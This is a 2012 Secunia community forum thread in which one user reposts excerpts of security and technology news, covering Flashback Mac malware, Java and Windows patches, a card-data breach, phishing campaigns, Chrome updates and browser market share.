Secunia CSI7
Advisories
Research
Forums
Create Profile
Our Commitment
PSI
PSI API
CSI
OSI
xSI
Vulnerabilities
Programs
Open Discussions
My Threads
Create Thread
Statistics
About

Forum Thread: Daily CYBERCLIPS April

You are currently viewing a forum thread in the Secunia Community Forum. Please note that opinions expressed here are not of Secunia but solely reflect those of the user who wrote it.

This thread was submitted in the following forum:
Open Discussions

This thread has been marked as locked.
mogs Daily CYBERCLIPS April
Expert Contributor 2nd Apr, 2012 19:40
Ranking: 2265
Posts: 6,266
User Since: 22nd Apr, 2009
System Score: 100%
Location: UK

Nineteenth Edition.

Thankyou for the support . Hope you find something of value/interest in the new thread. The new INDEX thread will follow shortly.
Please refrain from scoring on both threads.
Security is the mainstay of the thread with some related and varied topics.
Scroll down for the latest posts !!
Note; that no entry/post should be taken as a personal recommendation, unless otherwise stated.
Please continue to keep CYBERCLIPS free of junk and unattractive to any contentious individuals..
* Keep patching : up to date : be Cybersafe ! *

--

mogs CClip 1
Expert Contributor 2nd Apr, 2012 19:58
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Unpatched Java bug infects Macs with Flashback malware
The Flashback.K variant is distributed via exploits for a known Java vulnerability that Apple has yet to patch

By Lucian Constantin
April 2, 2012 11:02 AM ET
IDG News Service - A Java vulnerability that hasn't yet been patched by Apple is being exploited by cybercriminals to infect Mac computers with a new variant of the Flashback malware, according to security researchers from antivirus firm F-Secure.

Flashback is a computer Trojan horse for Mac OS that first appeared in September 2011. The first variant was distributed as a fake Flash Player installer, but the malware has been changed significantly since then, both in terms of functionality and distribution methods.

Back in February, several antivirus companies reported that a new Flashback version was being distributed through Java exploits, which meant that the infection process no longer required user interaction.

More at :-
http://www.computerworld.com/s/article/9225757/Unp...

--
Was this reply relevant?
+0
-0
mogs CClip 2
Expert Contributor 2nd Apr, 2012 20:02
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
IE's browser share recovers, Chrome down for third straight month
Sign of a Microsoft turnaround, or just a calculation change by metrics company?

By Gregg Keizer
April 2, 2012 06:36 AM ET
Computerworld - Internet Explorer posted another major gain in share last month, the second in the first quarter of the year, perhaps signaling a turnaround in Microsoft's fortunes, a Web metrics company said Sunday.

Meanwhile, every rival, including Google's Chrome, which is usually the one stealing users, lost share.

Internet Explorer (IE) gained 1 percentage point during March, said measurement firm Net Applications, to end the month with a 53.8% share, its highest level since September 2011. Last month's growth was the second this year of 1 point or more.

Chrome lost a third of a percentage point to close March with 18.6%, while Mozilla's Firefox slipped by about the same to 20.6%, the open-source browser's lowest number in more than three years.

Apple's Safari and Opera Software's desktop browsers also dipped, falling by two-tenths and one-tenth of a point, respectively, to 5.1% and 1.6%.

More at :-
http://www.computerworld.com/s/article/9225740/IE_...

--
Was this reply relevant?
+0
-0
mogs CClip 3
Expert Contributor 2nd Apr, 2012 20:16
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
UK Government Wants Power to Monitor Internet Users

The United Kingdom government wants to give organizations such as MI5 and Government Communications Headquarters (GCHQ) the power to closely monitor all Internet traffic, including emails and website visits.


Similar to countries such as China, where every move made by Internet users is carefully monitored by the local government, UK citizens may also be tracked by state authorities.

According to The Guardian, the law is expected to be announced on May 9 and it will force service providers to collect information that may later be utilized by whichever agency requests it.

“It is vital that police and security services are able to obtain communications data in certain circumstances to investigate serious crime and terrorism and to protect the public. We need to take action to maintain the continued availability of communications data as technology changes,” a Home Office representative revealed.

More at :-
http://news.softpedia.com/news/UK-Governments-Want...

--
Was this reply relevant?
+0
-0
mogs CClip 4
Expert Contributor 2nd Apr, 2012 20:23
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Windows XP Gains Market Share in March, Windows 7 Loses Ground Although you might find the headline intriguing, you should know that things are indeed this way: Windows X gained ground in March when compared to February.

The old operating system from Microsoft remains the leading platform in user’s preferences, with a 46.86 percent market share of the OS market, up from the 45.39 percent it accounted for last month, the latest data from Net Applications shows.


Ever since Windows 7 arrived on shelves, Windows XP has been losing market share to it, yet it appears that it still has the power to remain on top of the market.

Microsoft has been focused on pushing Windows 7 to the front for the past few years, and is expected to continue doing so until Windows 8 arrives on devices.

However, it appears that enterprises are not yet ready to move to the newer platform, even if Microsoft is determined to end the support for Windows XP in 2014.

Windows 7 accounted for 38.12 percent of the operating system market in February, and went down to 37.54 percent in March.

Windows Vista lost share as well, now accounting for 7.65 percent of the market, while Windows 8 gained ground at 0.11 percent share.

In February, Windows 8 enjoyed only 0.03 percent market share, yet the release of the Consumer Preview version on February 29th helped it grow.

More at :-
http://news.softpedia.com/news/Windows-XP-Gains-Ma...

--
Was this reply relevant?
+0
-0
mogs CClip 5
Expert Contributor 2nd Apr, 2012 20:28
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Global Payments confirms 1.5 million MasterCard and Visa customer card details compromised Almost 1.5 million Mastercard and Visa customers have had their credit card details compromised following a successful cyber raid on payment processing systems provider Global Payments.
Reports of an attack on the company first surfaced on Friday.
In a subsequent conference call the firm's chief executive Paul Garcia confirmed hackers had successfully broken into the company's card processing systems.
Garcia also clarified that the attack was contained to the company's North American processing systems but said it was too early to confirm the exact number of accounts affected.
"The company believes fewer than 1.5 million card numbers may have been stolen and that the theft is confined to our North American processing system," he said.
He also revealed that the hackers did not manage to get all the data contained on the system, meaning certain core items remain safe from exploitation.

More at :-
http://www.v3.co.uk/v3-uk/news/2165460/hackers-ste...

--
Was this reply relevant?
+0
-0
mogs CClip 6
Expert Contributor 3rd Apr, 2012 09:25
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Oz launches DNSChanger testing site

Government service advises of connection-preventing malware infections
By Simon Sharwood, APAC Editor
Posted in Security, 3rd April 2012 01:24 GMT

Australia's government has created a website which detects the presence, or otherwise, of DNSChanger, a nasty piece of malware which the sites says “... changes a user's Domain Name System (DNS) settings, enabling criminals to direct unsuspecting internet users to fraudulent websites and otherwise interfere with their web browsing.”

“It has been associated with 'click fraud', the installation of additional malware and other malicious activities,” the site adds.

The hiply-named www.dns-ok.gov.au does what it says on the can: load up the site and you'll be told whether or not the malware lurks within your system and if, ergo, your DNS is okay. If you are infected, the site urges you to do something about it before the FBI switches off its kludge fix that stops the malware from doing it's worst. ®

http://www.theregister.co.uk/2012/04/03/dns_ok_gov...

--
Was this reply relevant?
+0
-0
mogs CClip 7
Expert Contributor 3rd Apr, 2012 19:47
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Mozilla blacklists vulnerable Java plug-ins from Firefox
Mozilla decided to automatically disable outdated Java plug-ins in Firefox on Windows because of ongoing attacks targeting them

By Lucian Constantin | IDG News Service

Mozilla has blacklisted unpatched versions of the Java plug-in from Firefox on Windows in order to protect its users from attacks that exploit known vulnerabilities in those versions.

Mozilla can add extensions or plug-ins to the Firefox add-on blocklist if they cause significant security or performance issues. Firefox installations automatically query the blocklist and notify users before disabling the targeted add-ons.

"The February 2012 update to the Java Development Kit (JDK) and Java Runtime Environment (JRE) included a patch to correct a critical vulnerability that can permit the loading of arbitrary code on an end-user's computer," said Mozilla's channel manager Kev Needham in a blog post Monday.

"This vulnerability -- present in the older versions of the JDK and JRE -- is actively being exploited, and is a potential risk to users," Needham said. "To mitigate this risk, we have added affected versions of the Java plugin for Windows (Version 6 Update 30 and below as well as Version 7 Update 2 and below) to Firefox's blocklist."

Needham did not specify the vulnerability being actively exploited, but security companies have warned during the past couple of weeks that exploits for the CVE-2010-0507 Java vulnerability were being used in widespread attacks and have been incorporated into the popular Blackhole exploit toolkit.

Read more at :-
http://www.infoworld.com/d/security/mozilla-blackl...

--
Was this reply relevant?
+0
-0
mogs CClip 8
Expert Contributor 3rd Apr, 2012 19:53
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Mozilla announces a working Firefox for Windows 8 Metro

Claims Metro is key in web browser wars
By Lawrence Latif
Tue Apr 03 2012, 17:53

SOFTWARE DEVELOPER Mozilla has announced that it has a working prototype of its Firefox web browser for the Metro user interface of Windows 8.
Mozilla had announced earlier that it would be building a version of its Firefox web browser for the Metro user interface in Microsoft's upcoming Windows 8 operating system. Within weeks, it announced that it had managed to port a build of Fennec over to Windows 8 Metro with a user interface that looks identical to Firefox for Android.
Mozilla's Brian Bondy said the browser can load websites, create tabs, bookmark pages, build history, retain cache, adjust preferences and generally behave like a web browser should. However Bondy said he didn't consider Mozilla's goal of having a working Firefox in Metro by the second quarter of 2012 as being met, saying that there are still open design questions and "a ton of platform integration work to do".

Read more at :-
http://www.theinquirer.net/inquirer/news/2165843/m...

--
Was this reply relevant?
+0
-0
mogs CClip 9
Expert Contributor 3rd Apr, 2012 19:58
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Whoops! Check Point lets checkpoint.com expire
By Tim Greene | Network World US | 03 April 12
It's got to be a little embarrassing for a security company steeped in paying attention to details like opening and closing firewall ports and monitoring whether applications are behaving oddly to overlook an arguably major item like maintaining the company's domain name, but it happened to Check Point Software.

The company's site was down yesterday from 8:07 to 8:30 a.m. EDT on Monday, and the official word is it wasn't their fault, according to a statement from the company posted on The Register.

In the statement the company acknowledged the site was down for 23 minutes because the domain registration expired, but it was because its domain host Network Solutions sent the renewal notice to the wrong email address at Check Point.



Read more: http://www.pcadvisor.co.uk/news/security/3348967/w...

--
Was this reply relevant?
+0
-0
mogs CClip 10
Expert Contributor 3rd Apr, 2012 20:03
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Hacker Reports Flaw in E-Learning Site Edmodo (Exclusive)

The popular e-learning platform Edmodo (edmodo.com), used by 6.6 million teachers and students worldwide, contains a number of vulnerabilities that could be leveraged by hackers to cause some serious damage to unsuspecting internauts.

The hacker known as Gambit provided us with information that demonstrates the existence of a persistent cross-site scripting (XSS) vulnerability and a cross-site request forgery (CSRF) flaw that affect Edmodo.

“Well, I contacted the admins a few weeks ago and they thanked me for reporting the vulnerabilities (persistent XSS and later a CSRF through the same vulnerable spot.),” Gambit explained.

“After reporting the CRSF a day or so later, he again thanked me and said he passed both the vulnerabilities up to one of the lead engineers. Well, weeks go by like I said and here we are, still not fixed.”

More at :-
http://news.softpedia.com/news/Hacker-Reports-Flaw...

--
Was this reply relevant?
+0
-0
mogs CClip 11
Expert Contributor 4th Apr, 2012 21:02
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
“US Airways Online Check-In” Emails Serve ZeuS

Internet users are advised to be on the lookout for malicious emails that purport to come from US Airways, bearing information regarding an online ticket reservation.

Kaspersky Lab experts inform that the phony notifications are well designed, even displaying a link to the company’s privacy policy.

However, behind the legitimate-looking “Online reservation details” link, the cybercrooks hid various malicious domains such as sulichat.hu, prakash.clanteam.com, or panvelkarrealtors.com.

If the link is clicked, the unsuspecting user is taken, after multiple redirects, to a site that hosts the infamous BlackHole exploit kit which tries to leverage vulnerabilities in Java, Adobe Reader, or Flash Player to drop a downloader.

This downloader connects to a command and control server from where it gets the sensitive-information-stealing Trojan known as ZeuS.

An interesting observation made by Kaspersky researchers is that all the objects involved in the attack, including ZeuS, the domains, and the downloader, are periodically changed.

More at :-
http://news.softpedia.com/news/US-Airways-Online-C...

--
Was this reply relevant?
+0
-0
mogs CClip 12
Expert Contributor 4th Apr, 2012 21:08
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Comodo Launches Free Malware Scanning Service for Sites

Security solutions provider Comodo released a free service called SiteInspector, designed to scan websites for pieces of malware and compare them against a range of blacklisting services, such as the ones offered by Google Safe Browsing, PhishTank or Malwaredomainlist.

SiteInspector allows users to choose 3 pages on a domain that they want monitored. If the service identifies any trace of malicious elements, the customer is immediately notified via email.

Drive-by-download malware attacks launched from websites that fall victim to mass infections are highly common these days.

In these situations, one of the main problems is that the owner doesn’t even know that his site is altered to serve pieces of malware. Another issue is that once the site is infected, blacklisting services, such as the ones run by Google, will restrict the traffic, a measure that can have devastating consequences for the business workflow.

This is why security firms come up with such tools and services. SiteInspector can take that burden off the shoulders of the administrator and automatize the malware scanning and blacklist monitoring process.

More at :-
http://news.softpedia.com/news/Comodo-Launches-Fre...

--
Was this reply relevant?
+0
-0
mogs CClip 13
Expert Contributor 4th Apr, 2012 21:14
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Google Chrome Dev 19.0.1084.9 Google has released a new Dev version for their web browser, incrementing the build number to 19.0.1084.9. The new revision is available for all supported platforms: Windows, Mac, Linux and Chrome Frame.

Apart from fixes, the set of changes also includes an update for the JavaScript engine, to build 3.9.24.7. Performance and stability improvements are a given with each release, but this version of V8 also enables snapshots on MIPS-based devices and comes with activated count-based profiler for ARM.

Repairs in this release of the web browser eliminate a few crash bugs on Windows and Mac, but also tackle an issue that affected the search in the “Settings” tab. Typing a keyword after deleting a previous one would cause the most recent entry to change to the first character of the first keyword.

http://news.softpedia.com/news/Download-Google-Chr...

--
Was this reply relevant?
+0
-0
mogs CClip 14
Expert Contributor 4th Apr, 2012 21:22
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Urgent Fix for Zero-Day Mac Java Flaw

Apple on Monday released a critical update to its version of Java for Mac OS X that plugs at least a dozen security holes in the program. More importantly, the patch mends a flaw that attackers have recently pounced on to broadly deploy malicious software, both on Windows and Mac systems.
The update, Java for OS X Lion 2012-001 and Java for Mac OS X 10.6 Update 7, sews up an extremely serious security vulnerability (CVE-2012-0507) that miscreants recently rolled into automated exploit kits designed to deploy malware to Windows users. But in the past few days, information has surfaced to suggest that the same flaw has been used with great success by the Flashback Trojan to infect large numbers of Mac computers with malware.

Read more at :-
http://krebsonsecurity.com/category/latest-warning...

--
Was this reply relevant?
+0
-0
mogs CClip 15
Expert Contributor 4th Apr, 2012 21:31
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Adobe Intros Open Source Malware Classifier

The Adobe Malware Classifier is available for download from SourceForge.

April 03, 2012 Share
Adobe Systems recently released a malware classification tool designed to assist in the identification of malicious files.

"The 'Adobe Malware Classifier' tool uses machine learning algorithms to classify Windows executable and dynamic link library (DLL) files as clean, malicious or unknown, Adobe security engineer Karthik Raman said in a recent blog post," writes PCWorld's Lucian Constantin. "Raman originally developed Malware Classifier for in-house use by Adobe's Product Security Incident Response (PSIRT) Team."

"Adobe has decided to release the Python script publicly under an open source BSD license," Constantin writes. "It is available for download from SourceForge."

Go to "Adobe Releases Open Source Malware Classification Tool" to read the details.

http://www.esecurityplanet.com/open-source-securit...

--
Was this reply relevant?
+0
-0
mogs CClip 16
Expert Contributor 5th Apr, 2012 21:34
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Microsoft acquires 20 new Windows security ideas for $13,400 each
$268,000 BlueHat Prize contest 'cheap way to get someone else to innovate,' says expert

By Gregg Keizer
April 4, 2012 05:34 PM
Computerworld - Microsoft has received 20 submissions in the $268,000 contest it hopes will result in new security technologies being baked into Windows, a company security strategist said Tuesday.

The "BlueHat Prize" contest, which debuted in August 2011, offers $200,000 as a first prize, $50,000 for second, and a subscription to Microsoft's developer network for third place. The three winners will be flown to Las Vegas this July, when Microsoft will announce the results at the Black Hat security conference.

Microsoft collected 20 entries before the April 1 deadline, said Katie Moussouris, a senior security strategist lead at Microsoft, on a company blog yesterday.

More at :-
http://www.computerworld.com/s/article/9225849/Mic...

--
Was this reply relevant?
+0
-0
mogs CClip 17
Expert Contributor 5th Apr, 2012 21:41
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Chrome Stable and Beta Channel Updates
| 10:29
Labels: Beta updates, Stable updates

The Chrome Stable and Beta channels have been updated to 18.0.1025.151 on Windows, Mac, Linux and Chrome Frame. This release fixes issues including:
black screen on Hybrid Graphics system with GPU accelerated compositing enabled (Issue: 117371)
CSS not applied to <content> element (Issue: 114667)
Regression rendering a div with background gradient and borders (Issue: 113726)
Canvas 2D line drawing bug with GPU acceleration (Issue: 121285)
Multiple crashes (Issues: 72235, 116825 and 92998)
Pop-up dialog is at wrong position (Issue: 116045)
HTML Canvas patterns are broken if you change the transformation matrix (Issue: 112165)
SSL interstitial error "proceed anyway" / "back to safety" buttons don't work (Issue: 119252)
Known Issues:
HTML5 audio doesn't work on some Mac computers (Issue: 109441)
Security fixes and rewards:

A new version of Flash Player is included. More details are available in an addendum to this Flash Player advisory.

Please see the Chromium security page for more detail. Note that the referenced bugs may be kept private until a majority of our users are up to date with the fix.

[$500] [106577] Medium CVE-2011-3066: Out-of-bounds read in Skia clipping. Credit to miaubiz.
[117583] Medium CVE-2011-3067: Cross-origin iframe replacement. Credit to Sergey Glazunov.
[$1000] [117698] High CVE-2011-3068: Use-after-free in run-in handling. Credit to miaubiz.
[$1000] [117728] High CVE-2011-3069: Use-after-free in line box handling. Credit to miaubiz.
[118185] High CVE-2011-3070: Use-after-free in v8 bindings. Credit to Google Chrome Security Team (SkyLined).
[118273] High CVE-2011-3071: Use-after-free in HTMLMediaElement. Credit to pa_kt, reporting through HP TippingPoint ZDI (ZDI-CAN-1528).
[118467] Low CVE-2011-3072: Cross-origin violation parenting pop-up window. Credit to Sergey Glazunov.
[$1000] [118593] High CVE-2011-3073: Use-after-free in SVG resource handling. Credit to Arthur Gerkis.
[$500] [119281] Medium CVE-2011-3074: Use-after-free in media handling. Credit to S&#322;awomir B&#322;a&#380;ek.
[$1000] [119525] High CVE-2011-3075: Use-after-free applying style command. Credit to miaubiz.
[$1000] [120037] High CVE-2011-3076: Use-after-free in focus handling. Credit to miaubiz.
[120189] Medium CVE-2011-3077: Read-after-free in script bindings. Credit to Google Chrome Security Team (Inferno).

Many of these bugs were detected using AddressSanitizer.


More detailed updates are available on the Chrome Blog. Full details about what changes are in this release are available in the SVN revision log. Interested in hopping on the stable channel? Find out how. If you find a new issue, please let us know by filing a bug.

Karen Grunberg
Google Chrome

--
Was this reply relevant?
+0
-0
mogs CClip 18
Expert Contributor 5th Apr, 2012 21:46
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Fast-growing Flashback botnet includes over 600,000 Macs
Java-based attacks against Mac users resulted in over 600,000 Mac computers being infected with the Flashback Trojan horse, malware experts say

By Lucian Constantin | IDG News Service

More than 600,000 Macs have been infected with a new version of the Flashback Trojan horse that's being installed on people's computers with the help of Java exploits, security researchers from Russian antivirus vendor Doctor Web said on Wednesday.

Flashback is a family of Mac OS malware that appeared in September 2011. Older Flashback versions relied on social engineering tricks to infect computers, but the latest variants are distributed via Java exploits that don't require user interaction.

On Tuesday, Apple released a Java update in order to address a critical vulnerability that's being exploited to infect Mac computers with the Flashback Trojan horse.

However, a large number of users have already been affected by those attacks, Doctor Web said in a report issued on Wednesday. The company's researchers have managed to hijack a part of the Flashback botnet through a method known in the security community as sinkholing, and counted unique identifiers belonging to more than 550,000 Mac OS X systems infected with the Trojan horse

More at :-
http://www.infoworld.com/d/security/fast-growing-f...

--
Was this reply relevant?
+0
-0
mogs CClip 19
Expert Contributor 5th Apr, 2012 21:52
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Firms warned over IPv6 security risks

Industry players urge end users to step up security as IPv6 adoption grows.
By Caroline Donnelly,

Companies need to be on their guard against cyber criminals using IPv6 networks to stage attacks, as the number of compatible end point devices in the workplace soars.

This is the view of WAN optimisation vendor Blue Coat Systems, who want firms to upgrade their security strategies to cover IPv6 network vulnerabilities.

The use of IPv6 networks has been gradually rising in recent years as the number of IPv4 addresses has dwindled.

This shift has been gaining momentum since the beginning of the year, when the Internet Society confirmed 6 June as World IPv6 Launch Day.

More at :-
http://www.itpro.co.uk/639937/firms-warned-over-ip...

--
Was this reply relevant?
+0
-0
mogs CClip 20
Expert Contributor 5th Apr, 2012 21:59
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
SharePoint 2010 now supports Chrome, Firefox

Latest versions of third-party browsers supported, but IE6 cast out
By Simon Sharwood, APAC Editor

Posted in Software, 5th April 2012 01:17 GMT

Microsoft has made a small-but-useful change to SharePoint 2010, as the popular collaboration suite now supports Firefox and, for the first time, Chrome.

The change was announced in a low-key blog post by Kirk Stark, Senior Writer on the SharePoint Server Platforms Team, which states “For any third-party browser (including Google Chrome, Firefox, Apple Safari, etc.) we will support the latest publically released version. There is no more distinction regarding version numbers.”

The new list of supported browsers, available at the SharePoint 2010 Plan Browser Support page, reveals that SharePoint will happily run without limitations in Chrome and Firefox.

Safari is now supported too, but won't behave well enough to do everything the SharePoint 2010 web interface allows.

Internet Explorer 6 has been downgraded from “not tested” to “not supported” as Redmond tries to hammer yet more nails into the coffin of the once-oddly-popular browser.

64-bit browsers are still a no-no and various limitations crop up when using ActiveX controls.

The old list of supported browsers can be seen if you fire up the wayback machine and head here. ®

http://www.theregister.co.uk/2012/04/05/sharepoint...

--
Was this reply relevant?
+0
-0
mogs CClip 21
Expert Contributor 5th Apr, 2012 22:06
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
LibreOffice 3.5.2 Final Available for Download After two release candidates, the final version for LibreOffice 3.5.2 has rolled out. There are no changes since the second RC shipped a month ago, but the developer offers some useful notes for those that haven’t yet adopted this version of the suite.

Windows users still working with versions of LibreOffice older than build 3.4.5 are recommended either to upgrade to 3.4.5 first and then update to the latest release, or to remove the old bits altogether and perform a fresh install of the current revision.

Also on Windows, the presence of OpenOffice on the system, the recommendation goes to remove it, as the same file types are used by LibreOffice too. In case Office 2010 is present, there will be warnings that ODF 1.2 and extended documents written by LibreOffice 3.5 are invalid, but it will still open them.

On Linux it is advisable to use OpenJDK instead of the GCJ Java variant since the latter has known issues with LibreOffice.

http://news.softpedia.com/news/LibreOffice-3-5-2-F...

--
Was this reply relevant?
+0
-0
mogs CClip 22
Expert Contributor 9th Apr, 2012 19:30
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Details on Latest Windows Live Essentials 2011 Release Emerge A few weeks ago, Microsoft made available for download a new version of Windows Live Essentials 2011, namely 15.4.3555.308, and updated many of the components inside the suite.

At the time, the company said that the new release was only a minor update for the package, and did not offer specific info on what was modified.

Last week, however, a company’s employee posted on Microsoft Answers specific details on what the update included. For those who missed our previous post on the new Windows Live Essentials 2011 flavor, we should note that the update affected Windows Live Messenger, Mail, Photo Gallery, Movie Maker, Family Safety, Writer, and Windows Live Mesh.

The software was made available for users of Windows 7, Windows Server 2008 R2, and Windows Vista Service Pack 2, and Microsoft announced at the time that it was set to roll out to all customers in a matter of weeks.

According to said Microsoft employee, changes in this release include:

Setup: During installation, the splash screen loads faster after user accepts UAC prompt.

Windows Live Mail: When users click on photos within Windows Live Mail that are hosted on SkyDrive or Facebook, instead of using the Client Album Viewer to view the photos, a browser opens the web album viewer for that application.

Windows Live Messenger: Fixes the Messenger sign-in error "0x84cb000c" and the Messenger crash or hang when accepting/declining a pending invitation. When users click on photos are hosted on SkyDrive or Facebook, instead of using the Client Album Viewer to view the photos, a browser opens the web album viewer for that application.

Windows Live Movie Maker: Fixes error “80004003” where Windows Live Movie Maker can’t open project files. Fixes setup failure error “80040705” and error “87260103” or when Movie Maker becomes unresponsive, hangs when adding WMV video files.

Windows Photo gallery: Microsoft updated authorization method required to publish to Flickr and Facebook. Microsoft updated authorization method to communicate with Bing Maps services for geo tagging.

Dubbed “QFE3” (Quick Fix Engineering), the new release contains critical fixes for the Essentials package. Initially available only as an optional update, it will become a requirement for all eligible customers, Microsoft announced.

All those who update from Windows Live Essentials 2009 to 2011 will enjoy the aforementioned enhancements. Said updated apps are available for download from Softpedia as well, via the links below.

http://news.softpedia.com/news/Details-on-Latest-W...

--
Was this reply relevant?
+0
-0
mogs CClip 23
Expert Contributor 9th Apr, 2012 19:37
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Mozilla's Lightning 1.4b3 Released Mozilla announced today the availability of a new release for their Lightning add-on, integrated into Thunderbird by default. It is not a stable build, but the third beta for version 1.4, and it fixes some critical issues present in the previous revision.

Users running the second beta of the add-on in Thunderbird 12 (beta) may confront with a bunch of problems, such as gazing at blank calendars or the error console showing an abundance of errors. At the root of the trouble are broken localizations, which have been erroneously introduced.

Lightning 1.4b3 should also prove to be useful for those using Provider for Google Calendar add-on, as it fixes the problem that makes events in secondary calendars to be moved to the primary one when editing.

A stable build for Lightning as well as a new one for Provider for Google Calendar are planned to ship on May 1st.

http://news.softpedia.com/news/Mozilla-s-Lightning...

--
Was this reply relevant?
+0
-0
mogs CClip 24
Expert Contributor 9th Apr, 2012 19:45
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Web attacks use smart redirection to evade URL security scanners
Web attacks based on the Nuclear Pack exploit toolkit check for mouse cursor movement before serving their payload

By Lucian Constantin | 09 April 12
Security researchers from antivirus vendor ESET have come across new Web-based malware attacks that try to evade URL security scanners by checking for the presence of mouse cursor movement.
The new drive-by download attacks were spotted in the Russian Web space and don't require user interaction to infect computers with malware.

Most attacks of this type rely on hidden iframes being injected into legitimate, but compromised websites, to redirect their visitors to the actual attack page. However the websites affected by this new campaign don't exhibit such rogue elements.

Instead, rogue JavaScript code is being added to local JS files that get loaded in the "head" section of every HTML page, making the infection harder to spot, the ESET security researchers said in a blog post on Friday. Loading JavaScript in this way is a very common practice and is not particularly indicative of a compromise.

The code injected into these local JavaScript files loads a different JS file from an external location, but only if mouse cursor movement is detected on the page. The purpose of the mouse movement detection is to filter out URL scanners and Web crawlers used by security companies or search engines to detect infected websites.

Read more: http://www.pcadvisor.co.uk/news/security/3349812/w...

--
Was this reply relevant?
+0
-0
mogs CClip 25
Expert Contributor 9th Apr, 2012 21:03
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Microsoft retires Vista, Office 2007 from mainstream support this week
Security updates continue through mid-April 2017

By Gregg Keizer
April 9, 2012 02:36 PM ET
Computerworld - Microsoft will shift Windows Vista and Office 2007 into what it calls extended support over the next two days.

Vista, the problem-plagued operating system that never really took hold among users, will exit mainstream support on Tuesday, April 10. According to Microsoft, Office 2007 leaves mainstream support today.

In a product's extended support phrase, Microsoft continues to provide security patches to all users, but offers other fixes -- such as reliability and stability updates -- only to organizations that have signed support contracts with the company.

Just seven weeks ago, Microsoft quietly extended support for the consumer versions of Windows Vista -- as well as Windows 7 -- by five years to synchronize their support lifecycle with that of the comparable enterprise editions.

Read more at :-
http://www.computerworld.com/s/article/9225979/Mic...

--
Was this reply relevant?
+0
-0
mogs CClip 26
Expert Contributor 10th Apr, 2012 22:39
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Microsoft patches critical Windows zero-day bug that hackers are now exploiting
Fixes first security flaw in Windows 8 Consumer Preview

By Gregg Keizer

Computerworld - Microsoft today delivered six security updates to patch 11 vulnerabilities in Windows, Internet Explorer (IE), Office and several other products, including one bug that attackers are already exploiting.

The company also issued the first patch for Windows 8 Consumer Preview, the beta-like build Microsoft released at the end of February.

But it was MS12-027 that got the most attention today.

"Things got a bit more interesting today," said Andrew Storms, director of security operations at nCircle Security, "because Microsoft is reporting limited attacks in the wild."

Flaws that attackers exploit before a patch is available are called "zero-day" vulnerabilities.

The single vulnerability patched in MS12-027 is in an ActiveX control included with every 32-bit version of Office 2003, 2007 and 2010; Microsoft also called out SQL Server, Commerce Server, BizTalk Server, Visual FoxPro and Visual Basic as needing the patch.

Storms, other security experts and Microsoft, too, all identified MS12-027 as the first update users should install.

Hackers are already using the vulnerability in malformed text documents, which when opened either in Word or WordPad -- the latter is a bare bones text editor bundled with every version of Windows, including Windows 7 -- can hijack a PC, Microsoft acknowledged in a post to its Security Research & Defense (SRD) blog today.

"We list MS12-027 as our highest priority security update to deploy this month because we are aware of very limited, targeted attacks taking advantage of [the] CVE-2012-0158 vulnerability using specially-crafted Office documents," said Elia Florio, an engineer with the Microsoft Security Response Center, in the SRD blog post.

More at :-
http://www.computerworld.com/s/article/9226060/Mic...

--
Was this reply relevant?
+0
-0
mogs CClip 27
Expert Contributor 10th Apr, 2012 22:46
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Last edited on 10th Apr, 2012 22:48
Chrome updates
Beta Channel Update
| 08:00
Labels: Beta updates
The Beta channel has been updated to 19.0.1084.15 for Windows, Mac, Linux, and Chrome Frame.

For an overview of key features in this release check out the Google Chrome Blog. Interested in switching to the Beta or Stable channels? You can also take a look at the changelog to see what happened in this release since 18.

If you'd like to get on the Beta channel, you can download it from our Beta download page. If you find a new issue, please let us know by filing a bug.

Anthony Laforge
Google Chrome
3 comments | Links to this post | Email Post

Stable Channel Update
Monday, April 9, 2012 | 17:03
Labels: Stable updates

The Chrome Stable channel has been updated to 18.0.1025.152 on Windows.


This release fixes issues with SSL (Issue: 118706). Please note this might reintroduce Issue: 117371 and we are actively working on a fix for it.


Interested in hopping on the stable channel? Find out how. If you find a new issue, please let us know by filing a bug.

Karen Grunberg

--
Was this reply relevant?
+0
-0
mogs CClip 28
Expert Contributor 11th Apr, 2012 05:55
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
How to Tell If an Email Is a Phishing Scam
By Meridith Levinson
April 10, 2012 03:57 PM ET
